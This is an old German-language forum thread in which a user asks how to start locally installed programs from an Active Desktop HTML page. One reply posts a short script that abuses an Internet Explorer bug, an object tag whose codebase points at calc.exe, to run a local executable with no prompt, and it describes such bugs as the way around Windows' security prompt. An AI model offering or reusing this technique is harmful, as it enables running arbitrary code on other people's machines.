Thunder: Programme von einer HTML-Seite aufrufen

Hallo Leute,

ich will für meinen Rechner eine Active Desktop Seite erstellen, aus der ich auch die auf meinem Rechner installierten Programm aufrufen kann. Gibt es da eine Möglichkeit dies mit HTML, JAVA oder Java-script zu realisieren??

Vielen Dank schon mal im vorraus.
Thunder

1. hi Thunder

mach nen normalen link auf die datei die du öffnen willst, sollte funktionieren. kann zwar sein das dann ein popup kommt das dich fragt ob öffnen oder spiechern, aber es sollte funktionieren :)

so long
    ole
    (8-)>

1. Das hab ich schon gemacht, aber ich hätte es doch gernen wenn die Frage nach dem öffenen oder Speichern nicht mehr kommen würde, denn auf dauer nerft das ganz schön.

Thunder

1. hi Thunder

ist ne ganz natürliche sicherheitsreaktion von windows, die man AFAIK nicht umgehen kann (außer seine sicherheitseinstellungen vieleicht ganz runter zu schrauben, wovon es allerdings abzuraten gilt!!!).

so long
        ole
        (8-)>

1. Gibt es denn da andere Möglichkeiten? Zum Beispiel mit ActiveX oder Java??

Thunder

2. Doch gibts genügend Möglichkeiten:

"Aber gilt als Bug"

http://www.heise.de/ct/browsercheck/e5demo.shtml

1. Mancher Code wird sogar als Virus erkannt (jaja die Virusscanner suchen dauernd Virencode um ihren Ticker wieder erhöhen zu können noch mehr Viren zu finden)

In Wirklichkeit ist es kein Virus sondern eher ein Bug bzw. sogar Absicht (denn manche dieser Bugs sind schon seit 1 Jahr bekannt und noch kein Patch drausen)

Wenn Du pardou undbedingt lokal von Deinem Rechner ein Programm starten willst dann geht es defnitiv nur mit Hilfe dieser Bugs.

Da reicht teilweise genau eine HTML Zeile (brauchst nichtmal Javscript -grins-)

1. Das ist mein Favorit:
        (habs auch erst geglaubt als ich es gesehn hab vor ein paar Monaten)

<span id="oSpan"></span>
        <script language="jscript" defer>
        oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>';
        </script>

Pfad muss natürlich bekannt sein und angepasst werden.
        Dieses Beispiel startet den Calculator unter NT.

3. Hallo,

1. Einen Ordner freigeben
    2. Deinen Rechner als sichere Seite eintragen.
    3. Dateien in die Freigabe legen.
    4. \<meinrechner><meinefreigabe><meinedatei>.html aufrufen

Wenn es als Active Desktop erscheinen soll, dann in der wallpapr.htm eine Weiterleitung auf Punkt 4 einbauen.

hth
    jonas